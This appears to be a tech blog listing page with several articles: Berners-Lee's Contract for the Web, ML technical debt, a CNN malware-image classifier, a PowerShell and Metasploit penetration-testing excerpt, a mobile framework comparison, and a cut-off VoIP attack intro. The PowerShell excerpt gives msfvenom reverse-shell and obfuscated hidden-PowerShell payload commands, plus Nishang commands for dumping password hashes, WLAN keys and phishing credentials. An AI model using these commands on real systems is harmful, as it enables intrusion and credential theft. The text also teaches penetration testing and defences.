
How-To Tutorials


Tim Berners-Lee is on a mission to save the web he invented

Bhagyashree R
07 Nov 2018
4 min read
On Monday, at Web Summit 2018 in Lisbon, Tim Berners-Lee outlined his plan to 'save' the web he invented. His idea is simple: he wants to create a 'contract' for the web. The intervention comes at an important time, in a year of 'techlash' and growing scepticism about the ability of technology and the web to deliver progress for everyone.

Tim Berners-Lee on the Contract for the Web

In his talk, Berners-Lee pointed out that one of the properties the web should preserve is universality. He also argued that the web should be independent, with no restrictions on what it can be used for, and that it should be available in every region, culture, and religion. He sees these values as currently under attack: "Those of us who are online are seeing our rights and freedoms threatened." He also listed other challenges that have yet to be addressed, including fake news and privacy.

His solution to these huge challenges is something called the 'Contract for the Web', which will, he claims, outline "clear and tough responsibilities for those who have the power to make it better." Although Berners-Lee was relatively light on detail, the full contract is due to be published in May 2019. In theory, it should define people's online rights and list the key principles and duties that governments, companies, and citizens should follow. In Berners-Lee's mind, it will restore some degree of equilibrium and transparency to the digital realm.

The core principles of the Contract for the Web

Tim Berners-Lee did offer some information on what the Contract for the Web will include. Below are some of the key principles for the key stakeholders in the running of the web: governments, businesses, and citizens, people like you.

Governments

Anyone should be able to connect to the web, irrespective of who they are and where they live, and they should be allowed to participate actively online. The internet should be available all the time, so that nobody is denied the right to full internet access. Privacy, a fundamental right, should be respected so that people can use the internet freely, safely, and without fear.

Companies

Companies should offer users an affordable and accessible internet. Consumers' privacy and personal data should be respected. They should build technologies that support the best in humanity and challenge the worst.

Citizens

Citizens should involve themselves in creating and collaborating on rich and relevant content for everyone. They should build strong communities that respect civil discourse and human dignity. To ensure that the open web remains open, they should come together and fight for it.

The contract is already seeing strong support, with more than 50 organisations signing it, including heavyweights like Facebook and Google. It is being promoted through the #ForTheWeb campaign. The contract is part of a broader project that Berners-Lee believes is essential if we are to 'save' the web from its current problems. First, we need to create an open web for the users who are already connected and give them the power to fix the issues we have with the existing web. Second, we need to bring online the other half of the world that is not yet connected.

Tim Berners-Lee speaks to CNN about the Contract for the Web

After his talk, Tim Berners-Lee was interviewed by Laurie Segall from CNN. Here are some highlights from the interview. Internally, companies should have the motto of doing the right thing.
To make sure the principles are upheld, some measures will be introduced. But the contract is not just about creating a set of rules and enforcing them; it is about changing attitudes.

Privacy is our fundamental right and we should always fight for it. Fighting for privacy matters not only because of the data breaches we are seeing, but because it empowers individuals to share anything they want without fear.

As tech companies, we should realise the implications of each line of code we write and think about how it will affect people's lives.

To sum it all up, Tim Berners-Lee said that we all need to step back and put aside the myths we are currently taking as the physics of the way things work. People do not have to be motivated only by ad-based funding models or by clickbait. The Contract for the Web is about going back to these values. It is about people coming together to build the web and taking things into their own hands.

You can watch Tim Berners-Lee's full talk and the interview on YouTube.

Web Summit 2018: day 2 highlights
Tim Berners-Lee's Solid – Trick or Treat?
Sir Tim Berners-Lee on digital ethics and socio-technical systems at ICDPPC 2018


Technical and hidden debts in machine learning - Google engineers give their perspective

Prasad Ramesh
06 Nov 2018
6 min read
In a paper, Google engineers have pointed out the various costs of maintaining a machine learning system. The paper, Hidden Technical Debt in Machine Learning Systems, discusses technical debt and other ML-specific debts that are hidden or hard to detect. The authors found that it is common to incur massive maintenance costs in real-world machine learning systems. They looked at several ML-specific risk factors to account for in system design. These factors include boundary erosion, entanglement, hidden feedback loops, undeclared consumers, data dependencies, configuration issues, changes in the external world, and a number of system-level anti-patterns.

Boundary erosion in complex models

In traditional software engineering, setting strict abstraction boundaries helps achieve logical consistency among the inputs and outputs of a given component. It is difficult to set these boundaries in machine learning systems. Yet machine learning is needed precisely in areas where the desired behavior cannot be effectively expressed with traditional software logic without depending on data. This results in boundary erosion in a couple of areas.

Entanglement

Machine learning systems mix signals together and entangle them, making isolated improvements impossible. A change to one input may change all the other inputs, so an isolated improvement cannot be made. This is referred to as the CACE principle: Change Anything Changes Everything. There are two possible ways to avoid this. One is to isolate models and serve ensembles, which is useful in situations where the sub-problems decompose naturally; in many cases ensembles work well because the errors in the component models are not correlated. However, relying on this combination can itself create strong entanglement, and improving an individual model may make the system less accurate. Another strategy is to focus on detecting changes in prediction behavior as they occur.

Correction cascades

There are cases where a problem is only slightly different from another that already has a solution. It can be tempting to reuse the same model for the slightly different problem, learning a small correction as a fast way to solve the newer problem. This correction model, however, creates a new system dependency on the original model, which makes it significantly more expensive to analyze improvements to the models in the future. The cost increases when correction models are cascaded, and a correction cascade can create an improvement deadlock.

Visibility debt caused by undeclared consumers

A model is often made widely accessible and may later be consumed by other systems. Without access controls, these consumers may be undeclared, silently using the output of a given model as an input to another system. These issues are referred to as visibility debt. Undeclared consumers may also create hidden feedback loops.

Data dependencies cost more than code dependencies

Data dependencies can build debt in much the same way as code dependencies, only they are more difficult to detect. Without proper tooling to identify them, data dependencies can form large chains that are difficult to untangle. They come in two types.

Unstable data dependencies

To move along quickly, it is often convenient to use signals from other systems as input to your own. But some input signals are unstable: they can qualitatively or quantitatively change behavior over time. This can happen implicitly as the other system updates over time, or it can be changed explicitly. A mitigation strategy is to create versioned copies.
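The paper does not spell out an implementation for such versioning, but as a rough sketch (the file name, format, and pinning mechanism below are assumptions, not part of the paper), a training job could refuse to run when an upstream feature table no longer matches the content digest it was last validated against:

import hashlib
import pandas as pd

# Hypothetical sketch: pin an upstream feature table to a known content digest
# so that a silent change in the producing system is caught before training.
PINNED_DIGEST = "replace-with-the-digest-recorded-at-validation-time"

def dataset_digest(path: str) -> str:
    # Hash the row-wise content of the table, including its index.
    frame = pd.read_parquet(path)
    row_hashes = pd.util.hash_pandas_object(frame, index=True)
    return hashlib.sha256(row_hashes.values.tobytes()).hexdigest()

if dataset_digest("features/upstream_signals.parquet") != PINNED_DIGEST:
    raise RuntimeError("Upstream feature table changed; re-validate before training.")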
Underutilized data dependencies

Underutilized data dependencies are input signals that provide little incremental modeling benefit. They can make an ML system vulnerable to change where it is not necessary. Underutilized data dependencies can enter a model in several ways: via legacy, bundled, epsilon, or correlated features.

Feedback loops

Live ML systems often end up influencing their own behavior as they are updated over time. This leads to analysis debt: it is difficult to predict the behavior of a given model before it is released. Such feedback loops are difficult to detect and address if they occur gradually over time, which may be the case if the model is not updated frequently. In a direct feedback loop, a model may directly influence the selection of its own future training data. In a hidden feedback loop, two systems influence each other indirectly.

Machine learning system anti-patterns

It is common for systems that incorporate machine learning methods to end up with high-debt design patterns.

Glue code: Using generic packages results in a glue code system design pattern, in which a massive amount of supporting code is written to get data into and out of general-purpose packages.

Pipeline jungles: Pipeline jungles often appear in data preparation as a special case of glue code. They can evolve organically as new sources are added, and the result can become a jungle of scrapes, joins, and sampling steps.

Dead experimental codepaths: Glue code commonly becomes increasingly attractive in the short term because none of the surrounding structures need to be reworked. Over time, these accumulated codepaths create a growing debt due to the increasing difficulty of maintaining backward compatibility.

Abstraction debt: There is a lack of support for strong abstractions in ML systems.

Common smells: A smell may indicate an underlying problem in a component or system. These can be data smells, multiple-language smells, or prototype smells.

Configuration debt

Debt can also accumulate when configuring a machine learning system. A large system has a wide range of configuration options covering features, data selection, verification methods, and so on. It is common for configuration to be treated as an afterthought. In a mature system, the number of configuration lines can exceed the number of code lines, and every configuration line has the potential for mistakes.

Dealing with external world changes

ML systems interact directly with the external world, and the external world is rarely stable. Some measures that can be taken to deal with this instability are:

Fixing thresholds in dynamic systems: It is necessary to pick a decision threshold for a given model to perform some action, for example to predict true or false, to mark an email as spam or not spam, or to show or not show a given advertisement.

Monitoring and testing: Unit testing and end-to-end testing cannot ensure the complete, proper functioning of an ML system. For long-term system reliability, comprehensive live monitoring and automated response are critical. That raises the question of what to monitor; the authors of the paper point out three areas as starting points: prediction bias, limits for actions, and upstream producers.
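The paper does not prescribe specific tooling for such monitoring, but as a minimal sketch of the prediction-bias idea (the function names, threshold, and example numbers below are illustrative assumptions), a system could compare the distribution of labels predicted on live traffic against the distribution observed at validation time and alert on a large divergence:

import numpy as np

# Hypothetical sketch: alert when the live distribution of predicted labels
# drifts away from the distribution recorded when the model was validated.
def label_distribution(predictions, num_classes):
    counts = np.bincount(np.asarray(predictions), minlength=num_classes)
    return counts / counts.sum()

def check_prediction_bias(live_predictions, baseline_distribution, threshold=0.05):
    live = label_distribution(live_predictions, len(baseline_distribution))
    drift = np.abs(live - np.asarray(baseline_distribution)).max()
    if drift > threshold:
        print(f"ALERT: prediction distribution drifted by {drift:.3f}")
    return drift

# Example: baseline measured at validation time, predictions from recent traffic.
baseline = [0.70, 0.20, 0.10]
check_prediction_bias([0, 0, 1, 2, 0, 1, 0, 0, 2, 1], baseline)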
Other related areas in ML debt

In addition to the areas mentioned above, an ML system may also face debt from other areas, including data testing debt, reproducibility debt, process management debt, and cultural debt.

Conclusion

Moving quickly often introduces technical debt. The most important insight from this paper, according to the authors, is that technical debt is an issue that both engineers and researchers need to be aware of. Paying down machine-learning-related technical debt requires commitment, which can often only be achieved by a shift in team culture. Recognizing, prioritizing, and rewarding this effort is important for the long-term health of successful machine learning teams. For more details, you can read the paper on the NIPS website.

Uses of Machine Learning in Gaming
Julia for machine learning. Will the new language pick up pace?
Machine learning APIs for Google Cloud Platform


How to build a convolutional neural network based malware detector using malware visualization [Tutorial]

Savia Lobo
05 Nov 2018
9 min read
Deep Learning (DL), a subfield of machine learning, arose to help build algorithms that work like the human mind and are inspired by its structure. Information security professionals are also intrigued by such techniques, as they have provided promising results in defending against major cyber threats and attacks. One of the best-suited candidates for the application of DL is malware analysis.

This tutorial is an excerpt taken from the book Mastering Machine Learning for Penetration Testing, written by Chiheb Chebbi. In this book, you will learn to identify ambiguities, extensive techniques to breach an intelligent system, and much more. In this post, we are going to explore artificial neural network architectures and learn how to use one of them to help malware analysts and information security professionals detect and classify malicious code. Before diving into the technical details and the steps for the practical implementation of the DL method, it is essential to learn about the other architectures of artificial neural networks.

Convolutional Neural Networks (CNNs)

Convolutional Neural Networks (CNNs) are a deep learning approach to the image classification problem, or what we call computer vision problems, because classic computer programs face many challenges and difficulties in identifying objects, for reasons including lighting, viewpoint, deformation, and segmentation. The technique is inspired by how the eye works, especially the visual cortex in animals. In a CNN, neurons are arranged in three-dimensional structures characterized by width, height, and depth. In the case of images, the height is the image height, the width is the image width, and the depth is the RGB channels. To build a CNN, we need three main types of layer:

Convolutional layer: A convolutional operation extracts features from the input image by multiplying the values in the filter with the original pixel values.
Pooling layer: The pooling operation reduces the dimensionality of each feature map.
Fully-connected layer: The fully-connected layer is a classic multi-layer perceptron with a softmax activation function in the output layer.

To implement a CNN with Python, you can use the following Python script (written for an older Keras release that still exposes set_image_dim_ordering and np_utils):

import numpy
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import Dropout
from keras.layers import Flatten
from keras.layers.convolutional import Conv2D
from keras.layers.convolutional import MaxPooling2D
from keras.utils import np_utils
from keras import backend

# Use Theano-style (channels-first) ordering to match input_shape=(1, 28, 28)
backend.set_image_dim_ordering('th')

num_classes = 10  # e.g. ten digit classes when training on MNIST

model = Sequential()
model.add(Conv2D(32, (5, 5), input_shape=(1, 28, 28), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])

Recurrent Neural Networks (RNNs)

Recurrent Neural Networks (RNNs) are artificial neural networks that can make use of sequential information, such as sentences. In other words, RNNs perform the same task for every element of a sequence, with the output depending on the previous computations. RNNs are widely used in language modeling and text generation (machine translation, speech recognition, and many other applications). However, RNNs do not remember things for a long time.
Long Short Term Memory networks

Long Short Term Memory (LSTM) networks solve the short-memory issue of recurrent neural networks by building in a memory block, sometimes called a memory cell.

Hopfield networks

Hopfield networks were developed by John Hopfield in 1982. Their main goals are auto-association and optimization. There are two categories of Hopfield network: discrete and continuous.

Boltzmann machine networks

Boltzmann machine networks use recurrent structures and rely only on locally available information. They were developed by Geoffrey Hinton and Terry Sejnowski in 1985, and the goal of a Boltzmann machine is to optimize solutions.

Malware detection with CNNs

For this new model, we are going to discover how to build a malware classifier with CNNs. But you may be wondering how we can do that when CNNs take images as inputs. The answer is really simple: the trick is converting malware into an image. Is this possible? Yes, it is. Malware visualization has been an active research topic over the past few years. One of the proposed solutions comes from a research study called Malware Images: Visualization and Automatic Classification by Lakshmanan Nataraj from the Vision Research Lab, University of California, Santa Barbara. The study describes how to convert a malware binary into an image (the original article shows, for example, an image of the Alueron.gen!J malware), and the technique also makes it possible to visualize malware sections in a detailed way.

By solving the issue of how to feed images into machine learning classifiers that use CNNs, information security professionals can use the power of CNNs to train models. One of the malware datasets most often used to feed CNNs is the Malimg dataset. It contains 9,339 malware samples from 25 different malware families. You can download it from Kaggle (a platform for predictive modeling and analytics competitions) by visiting this link: https://www.kaggle.com/afagarap/malimg-dataset/data. These are the malware families: Allaple.L, Allaple.A, Yuner.A, Lolyda.AA 1, Lolyda.AA 2, Lolyda.AA 3, C2Lop.P, C2Lop.gen!G, Instantaccess, Swizzor.gen!I, Swizzor.gen!E, VB.AT, Fakerean, Alueron.gen!J, Malex.gen!J, Lolyda.AT, Adialer.C, Wintrim.BX, Dialplatform.B, Dontovo.A, Obfuscator.AD, Agent.FYI, Autorun.K, Rbot!gen, and Skintrim.N.

After converting malware samples into grayscale images, you can use the resulting representations to feed the machine learning model. The conversion of each malware sample to a grayscale image can be done with the following Python script (note that it needs an older SciPy release, since scipy.misc.imsave was removed in SciPy 1.2):

import os
import array
import numpy
import scipy.misc

filename = '<Malware_File_Name_Here>'
f = open(filename, 'rb')
ln = os.path.getsize(filename)                   # length of the file in bytes
width = 256                                      # fixed image width
rem = ln % width
a = array.array("B")                             # unsigned byte array
a.fromfile(f, ln - rem)                          # drop the trailing partial row
f.close()
g = numpy.reshape(a, (len(a) // width, width))   # integer division for the row count
g = numpy.uint8(g)
scipy.misc.imsave('<Malware_File_Name_Here>.png', g)

For feature selection, you can extract or use any image characteristics, such as texture patterns, frequencies in the image, intensity, or color features, using techniques such as Euclidean distance or mean and standard deviation, to later generate feature vectors. In our case, we can use algorithms such as a color layout descriptor, a homogeneous texture descriptor, or global image descriptors (GIST). Let's suppose that we selected GIST; pyleargist is a great Python library for computing it.
To install it, use pip as usual:

# pip install pyleargist==1.0.1

As a use case, to compute a GIST descriptor you can use the following Python script:

from PIL import Image   # 'import Image' in older PIL installations
import leargist

image = Image.open('<Image_Name_Here>.png')
New_im = image.resize((64, 64))
des = leargist.color_gist(New_im)
Feature_Vector = des[0:320]

Here, 320 refers to the first 320 values of the descriptor, which is what we use for grayscale images. Don't forget to save the feature vectors as NumPy arrays so you can use them later to train the model.

After getting the feature vectors, we can train many different models, including SVM, k-means, and artificial neural networks. One of the useful algorithms is the CNN. Once feature selection and engineering are done, we can build a CNN. For our model, we will build a convolutional network with two convolutional layers and 32 * 32 inputs, implemented with the previously installed TensorFlow and utility libraries. This CNN architecture is not the only possible design, but it is the one we are going to use for this implementation. To build the model, and CNNs in general, I highly recommend Keras. The required imports are the following:

import keras
from keras.models import Sequential, Input, Model
from keras.layers import Dense, Dropout, Flatten
from keras.layers import Conv2D, MaxPooling2D
from keras.layers.normalization import BatchNormalization
from keras.layers.advanced_activations import LeakyReLU

As we discussed before, the grayscale images have pixel values that range from 0 to 255, and we need to feed the network with images of dimension 32 * 32 * 1:

train_X = train_X.reshape(-1, 32, 32, 1)
test_X = test_X.reshape(-1, 32, 32, 1)

We will train our network with these parameters:

batch_size = 64
epochs = 20
num_classes = 25

To build the architecture, use the following:

Malware_Model = Sequential()
Malware_Model.add(Conv2D(32, kernel_size=(3, 3), activation='linear', input_shape=(32, 32, 1), padding='same'))
Malware_Model.add(LeakyReLU(alpha=0.1))
Malware_Model.add(MaxPooling2D(pool_size=(2, 2), padding='same'))
Malware_Model.add(Conv2D(64, (3, 3), activation='linear', padding='same'))
Malware_Model.add(LeakyReLU(alpha=0.1))
Malware_Model.add(Flatten())   # flatten the feature maps so the Dense layers receive 2-D input
Malware_Model.add(Dense(1024, activation='linear'))
Malware_Model.add(LeakyReLU(alpha=0.1))
Malware_Model.add(Dropout(0.4))
Malware_Model.add(Dense(num_classes, activation='softmax'))

To compile the model, use the following:

Malware_Model.compile(loss=keras.losses.categorical_crossentropy, optimizer=keras.optimizers.Adam(), metrics=['accuracy'])

Fit and train the model:

Malware_Model.fit(train_X, train_label, batch_size=batch_size, epochs=epochs, verbose=1, validation_data=(valid_X, valid_label))

As you will have noticed, we are following the flow for training a neural network that was discussed in previous chapters. To evaluate the model, use the following code:

test_eval = Malware_Model.evaluate(test_X, test_Y_one_hot, verbose=0)
print('The accuracy of the Test is:', test_eval[1])
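Note that the excerpt assumes that train_X, train_label, valid_X, valid_label, test_X, and test_Y_one_hot have already been prepared. As a minimal, hypothetical sketch (the directory layout, split ratios, and helper names below are assumptions, not part of the book's code), the arrays could be built from the Malimg grayscale images roughly like this:

import os
import numpy as np
from PIL import Image
from keras.utils import to_categorical
from sklearn.model_selection import train_test_split

# Assumption: one sub-directory per malware family, each containing PNG images.
DATASET_DIR = 'malimg_dataset'
families = sorted(os.listdir(DATASET_DIR))

images, labels = [], []
for label, family in enumerate(families):
    family_dir = os.path.join(DATASET_DIR, family)
    for name in os.listdir(family_dir):
        img = Image.open(os.path.join(family_dir, name)).convert('L').resize((32, 32))
        images.append(np.asarray(img, dtype='float32') / 255.0)   # scale pixels to [0, 1]
        labels.append(label)

X = np.asarray(images).reshape(-1, 32, 32, 1)
y = to_categorical(np.asarray(labels), num_classes=len(families))

# Hold out a test set, then carve a validation set out of the training data.
train_X, test_X, train_label, test_Y_one_hot = train_test_split(X, y, test_size=0.2, random_state=42)
train_X, valid_X, train_label, valid_label = train_test_split(train_X, train_label, test_size=0.2, random_state=42)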
Thus, in this post, we discovered how to build malware detectors using different machine learning algorithms, and especially using the power of deep learning techniques.

If you've enjoyed reading this post, do check out Mastering Machine Learning for Penetration Testing to find loopholes and surpass a self-learning security system.

This AI generated animation can dress like humans using deep reinforcement learning
DeepCube: A new deep reinforcement learning approach solves the Rubik's cube with no human help
"Deep meta reinforcement learning will be the future of AI where we will be so close to achieving artificial general intelligence (AGI)", Sudharsan Ravichandiran


Weaponizing PowerShell with Metasploit and how to defend against PowerShell attacks [Tutorial]

Savia Lobo
04 Nov 2018
4 min read
PowerShell is a perfect tool for performing sophisticated attacks, and it can also be used side-by-side with the Metasploit Framework. This article is an excerpt taken from the book Advanced Infrastructure Penetration Testing, written by Chiheb Chebbi. In this book, you will learn advanced penetration testing techniques that will help you exploit databases, web and application servers, switches or routers, Docker, VLANs, VoIP, and VPNs. In today's post, we will combine the flexibility of Metasploit and PowerShell. This combination is a great opportunity to perform more customized attacks and security tests.

Interactive PowerShell

PowerShell attacks are already integrated into Metasploit. You can check this by using the search command:

msf> search powershell

Now it is time to learn how to use Metasploit with PowerShell. As a demonstration of one of the many uses, you can convert a PowerShell script into an executable file using the msfvenom utility:

>msfvenom -p windows/powershell_reverse_tcp LHOST=192.168.1.39 LPORT=4444 -f exe > evilPS.exe
>msfvenom -p windows/exec CMD="powershell -ep bypass -W Hidden -enc [Powershell script Here]" -f exe -e x86/shikata_ga_nai -o /root/home/ghost/Desktop/power.exe

PowerSploit

PowerSploit is an amazing set of PowerShell scripts used by information security professionals, and especially penetration testers. To download PowerSploit, grab it from its official GitHub repository, https://github.com/PowerShellMafia/PowerSploit:

# git clone https://github.com/PowerShellMafia/PowerSploit

After cloning the project, use the ls command to list the files. You will see that PowerSploit contains a lot of useful scripts for performing a number of tasks, such as:

AntivirusBypass
Exfiltration
Persistence
PowerSploit
PowerUp
PowerView

Nishang – PowerShell for penetration testing

Nishang is a great collection of tools used to perform many tasks during all the penetration testing phases. You can get it from https://github.com/samratashok/nishang:

# git clone https://github.com/samratashok/nishang

Listing the downloaded project shows that Nishang is loaded with many scripts and utilities for performing the tasks required during penetration testing missions, such as:

Privilege escalation
Scanning
Pivoting

You can explore all the available scripts by listing the contents of the Nishang project with the ls command. Let's explore the power of some of Nishang's scripts on a Windows machine. You can import all the modules using the Import-Module PowerShell cmdlet. If the import fails, don't worry: in order to use Import-Module, you need to open PowerShell as an administrator and type Set-ExecutionPolicy -ExecutionPolicy RemoteSigned. Then you can import the modules.

Now, if you want to use the Get-Information module, for example, you just need to type Get-Information. If you want to unveil WLAN keys, type Get-WLAN-Keys. You can go further and dump password hashes from a target machine in a post-exploitation mission, thanks to the Get-PassHashes module. However, if you want to run the command after getting a shell, use:

Powershell.exe -exec bypass -Command "& {Import-Module '[PATH_HERE]/Get-PassHashes.ps1'; Get-PassHashes}"

You can even perform a phishing attack using Invoke-CredentialPhish, in the same way as the previous demonstrations.
You can run this attack on the victim's machine.

Defending against PowerShell attacks

In the previous sections, we went through various techniques for attacking machines using Metasploit and PowerShell. Now it is time to learn how to defend against and mitigate PowerShell attacks. In order to protect against PowerShell attacks, you need to:

Implement the latest PowerShell version (version 5 at the time this book was written). To check, type Get-Host.
Monitor PowerShell logs.
Ensure a least-privilege policy and group policy settings. You can edit them with the Local Group Policy Editor. If you are using the Windows 10 Enterprise edition, you can also use AppLocker.
Use Constrained Language mode:

PS C:\Windows\system32> [environment]::SetEnvironmentVariable('__PSLockdownPolicy', '4', 'Machine')

To check the Constrained Language mode, type:

$ExecutionContext.SessionState.LanguageMode

That way, malicious scripts won't work.

Thus, in this article, we saw how to combine Metasploit and PowerShell to perform more customized attacks and security tests. If you've enjoyed reading this post, and want to learn how to exploit enterprise VLANs and go from theory to real-world experience, do check out Advanced Infrastructure Penetration Testing.

Pentest tool in focus: Metasploit
Approaching a Penetration Test Using Metasploit
Getting Started with Metasploitable2 and Kali Linux


JavaScript mobile frameworks comparison: React Native vs Ionic vs NativeScript

Bhagyashree R
03 Nov 2018
11 min read
Previously, when you wanted to build for both web and mobile, you would have to invest in separate teams with separate development workflows. Isn't that annoying? JavaScript-driven frameworks have changed this equation. You can now build mobile apps without having to learn a completely new language such as Kotlin, Java, or Objective-C, or a completely new development approach; you can use your current web development skills. One of the first technologies to do this was Cordova, which enabled web developers to package their web apps into a native binary and to access device APIs through plugins. Since then, developers have created a variety of alternative approaches to using JavaScript to drive native iOS and Android applications. In this article we will talk about three of these frameworks: React Native, Ionic, and NativeScript. After introducing these frameworks, we will compare them and try to find out which one is best in which scenarios.

What exactly are native and hybrid applications?

Before we start with the comparison, let's answer this simple question, as we are going to use these terms a lot in this article.

What are native applications?

Native applications are built for a particular platform and are written in a particular language. For example, Android apps are written in Java or Kotlin, and iOS apps are written in Objective-C or Swift. The word "native" here refers to a platform such as Android, iOS, or Windows Phone. Designed for a specific platform, these apps are considered to be more efficient in terms of performance, as well as more reliable. The downside of native applications is that a separate version of the app must be developed for each platform. As each version is written in a completely different programming language, you can't reuse any code from another platform's version. That's why native app development is considered more time-consuming and expensive than hybrid development, at least in theory.

What are hybrid applications?

Unlike native applications, hybrid applications are cross-platform. They are written in languages such as C# or JavaScript and compiled to be executed on each platform. For device-specific interactions, hybrid applications rely on plugins. Developing them is faster and simpler. They are also less expensive, as you have to develop only one app instead of multiple native apps for different platforms. The major challenge with hybrid apps is that they run in a WebView, which means they depend on the native browser. Because of this, hybrid apps aren't as fast as native apps. You can also face serious challenges if the app requires complex interaction with the device; after all, there's a limit to what plugins can achieve on this front. And since all the rendering is done using web technology, we can't produce a truly native user experience.

Let's now move on to an overview of the three frameworks.

What is React Native?

The story of React Native started in the summer of 2013 as Facebook's internal hackathon project, and it was later open sourced in 2015. React Native is a JavaScript framework used to build native mobile applications. As you might have already guessed from its name, React Native is based on React, a JavaScript library for building user interfaces. The reason it is called "native" is that the UI built with React Native consists of native UI widgets that look and feel consistent with apps built using native languages.

How does React Native work?
Under the hood, React Native translates your UI definition, written in JavaScript/JSX, into a hierarchy of native views appropriate for the target platform. For example, if we are building an iOS app, it will translate the Text primitive to a native iOS UIView, and on Android it will produce a native TextView. So even though we are writing a JavaScript application, we do not get a web app embedded inside the shell of a mobile one; we get a "real native app". But how does this "translation" take place? React Native runs on JavaScriptCore, the JavaScript engine on iOS and Android, and then renders native components. React components return markup from their render function, which describes how they should look. With React for the web, this translates directly to the browser's DOM. For React Native, the markup is translated to suit the host platform, so a <View> might become an Android-specific TextView.

Applications built with React Native

All the recent features in the Facebook app, such as Blood Donations, Crisis Response, Privacy Shortcuts, and Wellness Checks, were built with React Native. Other companies or products that use this framework include Instagram, Bloomberg, Pinterest, Skype, Tesla, Uber, Walmart, Wix, Discord, Gyroscope, SoundCloud Pulse, Tencent QQ, Vogue, and many more.

What is the Ionic framework?

The Ionic framework was created by Drifty Co. and was initially released in 2013. It is an open source, frontend SDK for developing hybrid mobile apps with familiar web technologies such as HTML5, CSS, and JavaScript. With Ionic, you can build and deploy apps that work across multiple platforms, such as native iOS, Android, desktop, and the web as a Progressive Web App.

How does the Ionic framework work?

Ionic is mainly focused on an application's look and feel, or the UI interaction. This tells us that it's not meant to replace Cordova or your favorite JavaScript framework. In fact, it still needs a native wrapper like Cordova to run your app as a mobile app, and it uses these wrappers to gain access to host operating system features such as the camera, GPS, and flashlight. Ionic apps run in a low-level browser shell such as UIWebView on iOS or WebView on Android, which is wrapped by tools like Cordova/PhoneGap. Currently, the Ionic framework has official integration with Angular, and support for Vue and React is in development. The team has recently released the Ionic 4 beta version, which comes with better support for Angular. This version supports the new Angular tooling and features, ensuring that Ionic apps follow Angular standards and conventions.

Applications built with Ionic

Some of the apps that use the Ionic framework are MarketWatch, Pacifica, Sworkit, Vertfolio, and many more. You can view the full list of applications built with the Ionic framework on their website.

What is NativeScript?

NativeScript is developed by Telerik (a subsidiary of Progress) and was first released in 2014. It's an open source framework that helps you build apps using JavaScript or any other language that transpiles to JavaScript, for example TypeScript. It directly supports the Angular framework and supports the Vue framework via a community-developed plugin. Mobile applications built with NativeScript are fully native apps, which use the same APIs as if they were developed in Xcode or Android Studio.
Additionally, software developers can re-purpose third-party libraries from CocoaPods, Android Arsenal, Maven, and npm.js in their mobile applications without the need for wrappers.

How does NativeScript work?

Since the applications are written in JavaScript, some proxy mechanism is needed to translate JavaScript code into the corresponding native APIs. This is done by the runtime parts of NativeScript, which act as a "bridge" between the JavaScript and the native worlds (Android and iOS). The runtimes make it possible to call APIs in the Android and iOS frameworks using JavaScript code. To do that, JavaScript virtual machines are used: Google's V8 for Android and WebKit's JavaScriptCore implementation distributed with iOS 7.0+.

Applications built with NativeScript

Some of the applications built with NativeScript are Strudel, BitPoints Wallet, Regelneef, and Dwitch.

React Native vs Ionic vs NativeScript

Now that we've introduced all three frameworks, let's tackle the difficult question: which framework is better?

#1 Learning curve

The time needed to learn any technology depends on the knowledge you already have. If you are a web developer familiar with HTML5, CSS, and JavaScript, it will be fairly easy to get started with all three frameworks. But if you are coming from a mobile development background, the learning curve will be a bit steep for all three. Among the three, the Ionic framework is the easiest to learn and implement, and it also has great documentation.

#2 Community support

Going by the GitHub stats, React Native is way ahead of the other two frameworks, both in terms of the popularity of the repository and the number of contributors. This year's GitHub Octoverse report also highlighted that React Native is one of the most active open source projects currently. The following table shows the stats at the time of writing (source: GitHub):

Framework       Stars    Forks    Contributors
React Native    70150    15712    1767
Ionic           35664    12205    272
NativeScript    15200    1129     119

Comparing these three frameworks by weekly package downloads on the npm website (source: npm trends) also indicates that React Native is the most popular framework of the three.

#3 Performance

Ionic apps, as mentioned earlier, are hybrid apps, which means they run in a WebView. Hybrid applications, as mentioned at the beginning, are arguably slower than JavaScript-driven native applications, as their speed depends on the WebView. This also makes Ionic less suitable for high-performance or UI-intensive apps, such as games. React Native, in turn, provides faster application speed. Since React works separately from the main UI thread, your application can maintain high performance without sacrificing capability. Additionally, the introduction of the React Fiber algorithm, implemented with the goal of accelerating visual rendering, adds to its performance. In the case of NativeScript, rendering slows the application down. Also, applications built with NativeScript for the Android platform are larger in size, and this larger size affects performance negatively.

#4 Marketplace

The marketplace for Ionic is great. The tool lists many starter apps, themes, and plugins, ranging from a DatePicker to Google Maps. Similarly, NativeScript has its official marketplace, listing 923 plugins in total. React Native, on the other hand, does not have a dedicated marketplace from Facebook.
However, there are some companies that do provide React Native plugins and starter apps.

#5 Reusability of the codebase

Because Ionic is a framework for developing "wrapped applications", it wins the code reusability contest hands down. Essentially, the very concept of Ionic is "write once, run everywhere". NativeScript isn't far behind Ionic in terms of code reusability. In August this year, the Progress team announced that they are working on a code-sharing project. To realize this code-sharing dream, the Angular and NativeScript teams have together created nativescript-schematics, a schematic that enables you to build both web and mobile apps from a single project. In the case of React Native, you can reuse the logic and structure of the components, but you have to rewrite the UI used in them. React Native follows a different approach: "learn once, write everywhere". This means that the same team of developers who built the iOS version will understand enough to build the Android version, but they still need some knowledge of Android. With React Native you end up with two separate projects. That's fine, because they are for two different platforms, but their internal structure will still be very similar.

So, which JavaScript mobile framework is best?

All three mobile frameworks come with their pros and cons. They are meant for the same objective but for different project requirements. Choosing any one of them depends on your project, your user requirements, and the skills of your team. While Ionic comes with the benefit of a single codebase, it's not suitable for graphics-intensive applications. React Native provides better performance than the other two, but adds the overhead of creating a native shell for each platform. The best thing about NativeScript is that it supports Vue, one of the fastest-growing JavaScript frameworks, but its downside is that it makes the app size large. In the future we will see more such frameworks that help developers quickly prototype, develop, and ship cross-platform applications. One of them is Flutter by Google, which is already creating a wave.

NativeScript 4.1 has been released
React Native 0.57 released with major improvements in accessibility APIs, WKWebView-backed implementation, and more!
Ionic framework announces Ionic 4 Beta


How to attack an infrastructure using VoIP exploitation [Tutorial]

Savia Lobo
03 Nov 2018
9 min read
Voice over IP (VoIP) is pushing business communications to a new level of efficiency and productivity. VoIP-based systems face security risks on a daily basis. Although a lot of companies focus on VoIP quality of service, they ignore the security aspects of the VoIP infrastructure, which makes them vulnerable to dangerous attacks.

